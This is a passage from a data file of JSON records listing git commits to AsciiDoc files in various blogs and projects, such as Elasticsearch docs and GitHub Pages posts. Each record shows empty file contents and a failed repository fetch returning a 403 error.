keithbrown\/bridgepoint,keithbrown\/bridgepoint,leviathan747\/bridgepoint,rmulvey\/bridgepoint,rmulvey\/bridgepoint,keithbrown\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint","old_file":"doc-bridgepoint\/notes\/9680_cli_import\/9680_cli_import_int.adoc","new_file":"doc-bridgepoint\/notes\/9680_cli_import\/9680_cli_import_int.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cortlandstarrett\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6fd0e5dbed125c4124d5eab93125774ded378441","subject":"Update 2016-08-19-2016-08-19.adoc","message":"Update 2016-08-19-2016-08-19.adoc","repos":"tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io","old_file":"_posts\/2016-08-19-2016-08-19.adoc","new_file":"_posts\/2016-08-19-2016-08-19.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tamakinkun\/tamakinkun.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5c7bb4588d83ac5f6b532d2a7799f075ad360c37","subject":"started work on #139","message":"started work on 
#139\n","repos":"kitenco\/aim42,feststelltaste\/aim42,rschimmack\/aim42,aim42\/aim42,aim42\/aim42,rschimmack\/aim42,feststelltaste\/aim42,kitenco\/aim42","old_file":"src\/main\/asciidoc\/patterns\/crosscutting\/crosscutting-patterns-complete\/plan-improvement.adoc","new_file":"src\/main\/asciidoc\/patterns\/crosscutting\/crosscutting-patterns-complete\/plan-improvement.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rschimmack\/aim42.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f2a25012b2db0d5f4d9e68478cb93cb2bbcfe5d8","subject":"Update 2017-01-28-Livros-de-Prolog.adoc","message":"Update 2017-01-28-Livros-de-Prolog.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-01-28-Livros-de-Prolog.adoc","new_file":"_posts\/2017-01-28-Livros-de-Prolog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fddab1d547673559262745a5149a4df2f14855c1","subject":"y2b create post A Keyboard Made Of Wood?","message":"y2b create post A Keyboard Made Of Wood?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-01-23-A-Keyboard-Made-Of-Wood.adoc","new_file":"_posts\/2016-01-23-A-Keyboard-Made-Of-Wood.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c3643247a15cb2bda22c8242c0cf707b8ca8fdbd","subject":"Update 2016-08-24-Episode-68-Tech-Talk-Bugs-and-Features.adoc","message":"Update 2016-08-24-Episode-68-Tech-Talk-Bugs-and-Features.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-08-24-Episode-68-Tech-Talk-Bugs-and-Features.adoc","new_file":"_posts\/2016-08-24-Episode-68-Tech-Talk-Bugs-and-Features.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21e94e6054354f59fd1bdca400bb8a2229aecbea","subject":"Revert \"Removing old documentation mentioning NodeBuilder.\"","message":"Revert \"Removing old documentation mentioning NodeBuilder.\"\n\nThis reverts commit 
3ca02d647eafcd875802109fcbd009e80d37e5bb.\n","repos":"qwerty4030\/elasticsearch,brandonkearby\/elasticsearch,Stacey-Gammon\/elasticsearch,StefanGor\/elasticsearch,pozhidaevak\/elasticsearch,gingerwizard\/elasticsearch,pozhidaevak\/elasticsearch,LeoYao\/elasticsearch,StefanGor\/elasticsearch,Helen-Zhao\/elasticsearch,avikurapati\/elasticsearch,camilojd\/elasticsearch,bawse\/elasticsearch,bawse\/elasticsearch,artnowo\/elasticsearch,jimczi\/elasticsearch,nomoa\/elasticsearch,ZTE-PaaS\/elasticsearch,avikurapati\/elasticsearch,yanjunh\/elasticsearch,lks21c\/elasticsearch,girirajsharma\/elasticsearch,ricardocerq\/elasticsearch,scottsom\/elasticsearch,GlenRSmith\/elasticsearch,brandonkearby\/elasticsearch,HonzaKral\/elasticsearch,elasticdog\/elasticsearch,uschindler\/elasticsearch,nilabhsagar\/elasticsearch,mohit\/elasticsearch,mikemccand\/elasticsearch,ricardocerq\/elasticsearch,wenpos\/elasticsearch,shreejay\/elasticsearch,strapdata\/elassandra5-rc,mikemccand\/elasticsearch,myelin\/elasticsearch,trangvh\/elasticsearch,bawse\/elasticsearch,bawse\/elasticsearch,robin13\/elasticsearch,IanvsPoplicola\/elasticsearch,liweinan0423\/elasticsearch,gfyoung\/elasticsearch,LeoYao\/elasticsearch,lks21c\/elasticsearch,zkidkid\/elasticsearch,mortonsykes\/elasticsearch,brandonkearby\/elasticsearch,elasticdog\/elasticsearch,kalimatas\/elasticsearch,MaineC\/elasticsearch,lks21c\/elasticsearch,nilabhsagar\/elasticsearch,robin13\/elasticsearch,IanvsPoplicola\/elasticsearch,awislowski\/elasticsearch,henakamaMSFT\/elasticsearch,artnowo\/elasticsearch,JSCooke\/elasticsearch,gingerwizard\/elasticsearch,sreeramjayan\/elasticsearch,qwerty4030\/elasticsearch,winstonewert\/elasticsearch,HonzaKral\/elasticsearch,strapdata\/elassandra,alexshadow007\/elasticsearch,i-am-Nathan\/elasticsearch,obourgain\/elasticsearch,coding0011\/elasticsearch,mohit\/elasticsearch,wangtuo\/elasticsearch,fforbeck\/elasticsearch,Helen-Zhao\/elasticsearch,scorpionvicky\/elasticsearch,camilojd\/elasticsearch,kalimatas\/elasticsearch,nknize\/elasticsearch,MisterAndersen\/elasticsearch,nazarewk\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,pozhidaevak\/elasticsearch,naveenhooda2000\/elasticsearch,a2lin\/elasticsearch,rajanm\/elasticsearch,scottsom\/elasticsearch,glefloch\/elasticsearch,myelin\/elasticsearch,IanvsPoplicola\/elasticsearch,spiegela\/elasticsearch,nilabhsagar\/elasticsearch,fernandozhu\/elasticsearch,ZTE-PaaS\/elasticsearch,gingerwizard\/elasticsearch,fred84\/elasticsearch,C-Bish\/elasticsearch,markwalkom\/elasticsearch,wenpos\/elasticsearch,rajanm\/elasticsearch,fernandozhu\/elasticsearch,wenpos\/elasticsearch,gfyoung\/elasticsearch,LeoYao\/elasticsearch,fernandozhu\/elasticsearch,Stacey-Gammon\/elasticsearch,fred84\/elasticsearch,fforbeck\/elasticsearch,elasticdog\/elasticsearch,mjason3\/elasticsearch,jimczi\/elasticsearch,rlugojr\/elasticsearch,spiegela\/elasticsearch,Helen-Zhao\/elasticsearch,i-am-Nathan\/elasticsearch,MisterAndersen\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,fernandozhu\/elasticsearch,sreeramjayan\/elasticsearch,lks21c\/elasticsearch,rajanm\/elasticsearch,wuranbo\/elasticsearch,glefloch\/elasticsearch,jprante\/elasticsearch,robin13\/elasticsearch,JackyMai\/elasticsearch,s1monw\/elasticsearch,obourgain\/elasticsearch,kalimatas\/elasticsearch,pozhidaevak\/elasticsearch,palecur\/elasticsearch,vroyer\/elasticassandra,vroyer\/elassandra,camilojd\/elasticsearch,LewayneNaidoo\/elasticsearch,JackyMai\/elasticsearch,girirajsharma\/elasticsearch,mohit\/elasticsearch,palecur\/elasticsearch,
dpursehouse\/elasticsearch,zkidkid\/elasticsearch,trangvh\/elasticsearch,Shepard1212\/elasticsearch,nomoa\/elasticsearch,nezirus\/elasticsearch,JervyShi\/elasticsearch,C-Bish\/elasticsearch,girirajsharma\/elasticsearch,gmarz\/elasticsearch,mortonsykes\/elasticsearch,gingerwizard\/elasticsearch,avikurapati\/elasticsearch,nezirus\/elasticsearch,obourgain\/elasticsearch,njlawton\/elasticsearch,coding0011\/elasticsearch,ZTE-PaaS\/elasticsearch,palecur\/elasticsearch,rlugojr\/elasticsearch,markwalkom\/elasticsearch,fforbeck\/elasticsearch,rajanm\/elasticsearch,MaineC\/elasticsearch,masaruh\/elasticsearch,masaruh\/elasticsearch,dpursehouse\/elasticsearch,sneivandt\/elasticsearch,brandonkearby\/elasticsearch,fred84\/elasticsearch,scorpionvicky\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,cwurm\/elasticsearch,scorpionvicky\/elasticsearch,LeoYao\/elasticsearch,njlawton\/elasticsearch,dongjoon-hyun\/elasticsearch,camilojd\/elasticsearch,GlenRSmith\/elasticsearch,henakamaMSFT\/elasticsearch,maddin2016\/elasticsearch,shreejay\/elasticsearch,awislowski\/elasticsearch,alexshadow007\/elasticsearch,njlawton\/elasticsearch,a2lin\/elasticsearch,MisterAndersen\/elasticsearch,s1monw\/elasticsearch,fernandozhu\/elasticsearch,jprante\/elasticsearch,obourgain\/elasticsearch,nazarewk\/elasticsearch,MaineC\/elasticsearch,artnowo\/elasticsearch,awislowski\/elasticsearch,a2lin\/elasticsearch,girirajsharma\/elasticsearch,MaineC\/elasticsearch,wangtuo\/elasticsearch,vroyer\/elassandra,sneivandt\/elasticsearch,kalimatas\/elasticsearch,nomoa\/elasticsearch,strapdata\/elassandra,strapdata\/elassandra5-rc,wangtuo\/elasticsearch,yanjunh\/elasticsearch,strapdata\/elassandra5-rc,dongjoon-hyun\/elasticsearch,jprante\/elasticsearch,camilojd\/elasticsearch,mjason3\/elasticsearch,naveenhooda2000\/elasticsearch,rlugojr\/elasticsearch,gmarz\/elasticsearch,glefloch\/elasticsearch,vroyer\/elasticassandra,coding0011\/elasticsearch,markwalkom\/elasticsearch,umeshdangat\/elasticsearch,jprante\/elasticsearch,dpursehouse\/elasticsearch,nazarewk\/elasticsearch,HonzaKral\/elasticsearch,artnowo\/elasticsearch,nazarewk\/elasticsearch,umeshdangat\/elasticsearch,MaineC\/elasticsearch,LeoYao\/elasticsearch,coding0011\/elasticsearch,umeshdangat\/elasticsearch,ZTE-PaaS\/elasticsearch,gmarz\/elasticsearch,s1monw\/elasticsearch,alexshadow007\/elasticsearch,fred84\/elasticsearch,rlugojr\/elasticsearch,nilabhsagar\/elasticsearch,zkidkid\/elasticsearch,LewayneNaidoo\/elasticsearch,Helen-Zhao\/elasticsearch,cwurm\/elasticsearch,gmarz\/elasticsearch,Shepard1212\/elasticsearch,LewayneNaidoo\/elasticsearch,henakamaMSFT\/elasticsearch,trangvh\/elasticsearch,LewayneNaidoo\/elasticsearch,palecur\/elasticsearch,pozhidaevak\/elasticsearch,myelin\/elasticsearch,sreeramjayan\/elasticsearch,nknize\/elasticsearch,trangvh\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,shreejay\/elasticsearch,Shepard1212\/elasticsearch,mohit\/elasticsearch,naveenhooda2000\/elasticsearch,scottsom\/elasticsearch,wuranbo\/elasticsearch,gingerwizard\/elasticsearch,JackyMai\/elasticsearch,uschindler\/elasticsearch,JSCooke\/elasticsearch,lks21c\/elasticsearch,myelin\/elasticsearch,robin13\/elasticsearch,nazarewk\/elasticsearch,mortonsykes\/elasticsearch,rajanm\/elasticsearch,masaruh\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,jprante\/elasticsearch,dongjoon-hyun\/elasticsearch,strapdata\/elassandra5-rc,JackyMai\/elasticsearch,gfyoung\/elasticsearch,JSCooke\/elasticsearch,girirajsharma\/elasticsearch,vroyer\/elassandra,mortonsykes\/elasticsearch,yanjunh\/elasticsearch,wangtuo\/elast
icsearch,dpursehouse\/elasticsearch,Stacey-Gammon\/elasticsearch,njlawton\/elasticsearch,i-am-Nathan\/elasticsearch,sneivandt\/elasticsearch,mjason3\/elasticsearch,rlugojr\/elasticsearch,cwurm\/elasticsearch,henakamaMSFT\/elasticsearch,robin13\/elasticsearch,spiegela\/elasticsearch,GlenRSmith\/elasticsearch,sreeramjayan\/elasticsearch,JervyShi\/elasticsearch,geidies\/elasticsearch,bawse\/elasticsearch,dongjoon-hyun\/elasticsearch,maddin2016\/elasticsearch,Stacey-Gammon\/elasticsearch,obourgain\/elasticsearch,cwurm\/elasticsearch,sneivandt\/elasticsearch,qwerty4030\/elasticsearch,spiegela\/elasticsearch,sreeramjayan\/elasticsearch,C-Bish\/elasticsearch,liweinan0423\/elasticsearch,dongjoon-hyun\/elasticsearch,spiegela\/elasticsearch,StefanGor\/elasticsearch,a2lin\/elasticsearch,njlawton\/elasticsearch,qwerty4030\/elasticsearch,MisterAndersen\/elasticsearch,i-am-Nathan\/elasticsearch,maddin2016\/elasticsearch,mohit\/elasticsearch,geidies\/elasticsearch,LewayneNaidoo\/elasticsearch,HonzaKral\/elasticsearch,s1monw\/elasticsearch,fforbeck\/elasticsearch,JervyShi\/elasticsearch,nezirus\/elasticsearch,naveenhooda2000\/elasticsearch,JSCooke\/elasticsearch,ricardocerq\/elasticsearch,markwalkom\/elasticsearch,geidies\/elasticsearch,qwerty4030\/elasticsearch,liweinan0423\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,winstonewert\/elasticsearch,naveenhooda2000\/elasticsearch,henakamaMSFT\/elasticsearch,GlenRSmith\/elasticsearch,strapdata\/elassandra,nknize\/elasticsearch,Shepard1212\/elasticsearch,strapdata\/elassandra,wuranbo\/elasticsearch,scottsom\/elasticsearch,markwalkom\/elasticsearch,zkidkid\/elasticsearch,JSCooke\/elasticsearch,yanjunh\/elasticsearch,rajanm\/elasticsearch,gingerwizard\/elasticsearch,StefanGor\/elasticsearch,nezirus\/elasticsearch,ricardocerq\/elasticsearch,mikemccand\/elasticsearch,Helen-Zhao\/elasticsearch,wenpos\/elasticsearch,zkidkid\/elasticsearch,shreejay\/elasticsearch,dpursehouse\/elasticsearch,masaruh\/elasticsearch,geidies\/elasticsearch,winstonewert\/elasticsearch,jimczi\/elasticsearch,winstonewert\/elasticsearch,fforbeck\/elasticsearch,avikurapati\/elasticsearch,gfyoung\/elasticsearch,trangvh\/elasticsearch,palecur\/elasticsearch,fred84\/elasticsearch,nilabhsagar\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,awislowski\/elasticsearch,awislowski\/elasticsearch,wuranbo\/elasticsearch,jimczi\/elasticsearch,glefloch\/elasticsearch,gmarz\/elasticsearch,liweinan0423\/elasticsearch,IanvsPoplicola\/elasticsearch,i-am-Nathan\/elasticsearch,yanjunh\/elasticsearch,MisterAndersen\/elasticsearch,mortonsykes\/elasticsearch,nknize\/elasticsearch,nomoa\/elasticsearch,JervyShi\/elasticsearch,LeoYao\/elasticsearch,avikurapati\/elasticsearch,winstonewert\/elasticsearch,cwurm\/elasticsearch,markwalkom\/elasticsearch,geidies\/elasticsearch,C-Bish\/elasticsearch,uschindler\/elasticsearch,StefanGor\/elasticsearch,C-Bish\/elasticsearch,vroyer\/elasticassandra,scottsom\/elasticsearch,mjason3\/elasticsearch,a2lin\/elasticsearch,GlenRSmith\/elasticsearch,strapdata\/elassandra,Shepard1212\/elasticsearch,strapdata\/elassandra5-rc,uschindler\/elasticsearch,girirajsharma\/elasticsearch,myelin\/elasticsearch,camilojd\/elasticsearch,JackyMai\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,Stacey-Gammon\/elasticsearch,artnowo\/elasticsearch,shreejay\/elasticsearch,nomoa\/elasticsearch,ZTE-PaaS\/elasticsearch,kalimatas\/elasticsearch,maddin2016\/elasticsearch,umeshdangat\/elasticsearch,JervyShi\/elasticsearch,LeoYao\/elasticsearch,nezirus\/elasticsearch,IanvsPoplicola\/elast
icsearch,alexshadow007\/elasticsearch,JervyShi\/elasticsearch,jimczi\/elasticsearch,glefloch\/elasticsearch,ricardocerq\/elasticsearch,alexshadow007\/elasticsearch,geidies\/elasticsearch,mikemccand\/elasticsearch,umeshdangat\/elasticsearch,elasticdog\/elasticsearch,wuranbo\/elasticsearch,masaruh\/elasticsearch,s1monw\/elasticsearch,liweinan0423\/elasticsearch,elasticdog\/elasticsearch,mjason3\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,sreeramjayan\/elasticsearch,maddin2016\/elasticsearch,mikemccand\/elasticsearch,scorpionvicky\/elasticsearch,wangtuo\/elasticsearch,brandonkearby\/elasticsearch,wenpos\/elasticsearch,sneivandt\/elasticsearch","old_file":"docs\/groovy-api\/client.asciidoc","new_file":"docs\/groovy-api\/client.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markwalkom\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"53e939f93a13a27672a71a6f787a63ec36ea1ff9","subject":"Update 2015-04-27-a-stupid-error-in-swift.adoc","message":"Update 2015-04-27-a-stupid-error-in-swift.adoc","repos":"J0HDev\/blog,J0HDev\/blog,J0HDev\/blog","old_file":"_posts\/2015-04-27-a-stupid-error-in-swift.adoc","new_file":"_posts\/2015-04-27-a-stupid-error-in-swift.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/J0HDev\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9765188539207f099159d8366f5fcb2cbc7cdfd7","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80dc212fe7d68f4c6d65b3bece84e93525467a23","subject":"Update 2016-07-15-Inteligencia-Artificial.adoc","message":"Update 2016-07-15-Inteligencia-Artificial.adoc","repos":"christianmtr\/christianmtr.github.io,christianmtr\/christianmtr.github.io,christianmtr\/christianmtr.github.io,christianmtr\/christianmtr.github.io","old_file":"_posts\/2016-07-15-Inteligencia-Artificial.adoc","new_file":"_posts\/2016-07-15-Inteligencia-Artificial.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/christianmtr\/christianmtr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4532446c1df5bc2087d410946dc0025d6074abf9","subject":"y2b create post 3 Cool Gadgets Under $80","message":"y2b create post 3 Cool Gadgets Under $80","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-05-20-3-Cool-Gadgets-Under-80.adoc","new_file":"_posts\/2017-05-20-3-Cool-Gadgets-Under-80.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"032a6ae0c2c2f126ee00ee4910ba97d57c379c5b","subject":"Add 
Countdowns","message":"Add Countdowns\n","repos":"juxt\/tick,juxt\/tick","old_file":"doc\/cookbook\/countdown.adoc","new_file":"doc\/cookbook\/countdown.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/juxt\/tick.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3071b85c7cd35aa8b432d4eab50fdc071afc867b","subject":"Update howto-setup-build.adoc","message":"Update howto-setup-build.adoc","repos":"adi9090\/javaanpr,joshuagn\/ANPR,justhackit\/javaanpr,justhackit\/javaanpr,joshuagn\/ANPR,adi9090\/javaanpr","old_file":"docs\/howto-setup-build.adoc","new_file":"docs\/howto-setup-build.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joshuagn\/ANPR.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"97bf02b54ca952e9c6096be34997fc99d7472013","subject":"Update 2013-09-04-Back-to-school.adoc","message":"Update 2013-09-04-Back-to-school.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2013-09-04-Back-to-school.adoc","new_file":"_posts\/2013-09-04-Back-to-school.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fdf7598fd436dc157c20a7b1dfdaf4bc8ad1a1fa","subject":"y2b create post Enable LTE on the Nexus 4!","message":"y2b create post Enable LTE on the Nexus 4!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-11-24-Enable-LTE-on-the-Nexus-4.adoc","new_file":"_posts\/2012-11-24-Enable-LTE-on-the-Nexus-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e214a4cdf92bd03d378e4c969860527eefb51ff0","subject":"Update 2018-04-13-Amazon-Echover.adoc","message":"Update 2018-04-13-Amazon-Echover.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-13-Amazon-Echover.adoc","new_file":"_posts\/2018-04-13-Amazon-Echover.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0635dbff2b3efb68254031e8d6bd57ee19c6553b","subject":"Update 2016-08-12-My-first-development-job-was-a-nightmare.adoc","message":"Update 2016-08-12-My-first-development-job-was-a-nightmare.adoc","repos":"blackGirlsCode\/blog,blackGirlsCode\/blog,blackGirlsCode\/blog","old_file":"_posts\/2016-08-12-My-first-development-job-was-a-nightmare.adoc","new_file":"_posts\/2016-08-12-My-first-development-job-was-a-nightmare.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blackGirlsCode\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"79ebe47e494d9fd0f421f1851042533f418287ca","subject":"Update 2018-06-26-Introduction-of-Computational-Complexity.adoc","message":"Update 2018-06-26-Introduction-of-Computational-Complexity.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-26-Introduction-of-Computational-Complexity.adoc","new_file":"_posts\/2018-06-26-Introduction-of-Computational-Complexity.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ba53578ff270f6bf9e73d5e2fde8057ca4eb693d","subject":"y2b create post This thing's a BEAST (Zoom H6 Unboxing \\u0026 Test)","message":"y2b create post This thing's a BEAST (Zoom H6 Unboxing \\u0026 Test)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-08-13-This-things-a-BEAST-Zoom-H6-Unboxing-u0026-Test.adoc","new_file":"_posts\/2013-08-13-This-things-a-BEAST-Zoom-H6-Unboxing-u0026-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4dca91a72c84e8a434d0de821fcc38ea98fb66d7","subject":"Update 2017-04-21-criando-novo-projeto-nativescript-com-angular-2.adoc","message":"Update 2017-04-21-criando-novo-projeto-nativescript-com-angular-2.adoc","repos":"NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io","old_file":"_posts\/2017-04-21-criando-novo-projeto-nativescript-com-angular-2.adoc","new_file":"_posts\/2017-04-21-criando-novo-projeto-nativescript-com-angular-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/NativeScriptBrasil\/nativescriptbrasil.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"13b4588f8261f9889530771a7bc1564b19824a3c","subject":"y2b create post What Makes The Moto Z2 Force So Special?","message":"y2b create post What Makes The Moto Z2 Force So Special?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-08-24-What-Makes-The-Moto-Z2-Force-So-Special.adoc","new_file":"_posts\/2017-08-24-What-Makes-The-Moto-Z2-Force-So-Special.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"13c5356767b2641ebb931ac67315a4ebc781c6ab","subject":"Update 2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","message":"Update 
2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","new_file":"_posts\/2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e1e3733aea47103e490f5d16080212d9e9a0b7c","subject":"Update 2015-11-30-Episode-34-Dressed-to-a-Tee.adoc","message":"Update 2015-11-30-Episode-34-Dressed-to-a-Tee.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2015-11-30-Episode-34-Dressed-to-a-Tee.adoc","new_file":"_posts\/2015-11-30-Episode-34-Dressed-to-a-Tee.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ad627a3ed2334d4ca9747803f61c16b0a8c11e6","subject":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","message":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bbc63297f63a2e9247e629ed7b4c1ce1e1905683","subject":"Update 2017-01-27-Google-Apps-Script-De-W-B-S.adoc","message":"Update 2017-01-27-Google-Apps-Script-De-W-B-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-27-Google-Apps-Script-De-W-B-S.adoc","new_file":"_posts\/2017-01-27-Google-Apps-Script-De-W-B-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2895538e97f8631aa1ab718115e43174e0a14859","subject":"[release-notes] KUDU-2013 is fixed in Kudu 1.5","message":"[release-notes] KUDU-2013 is fixed in Kudu 1.5\n\nChange-Id: Ie3098b05747bc19b5d1a8f931d171cd4048c8bbf\nReviewed-on: 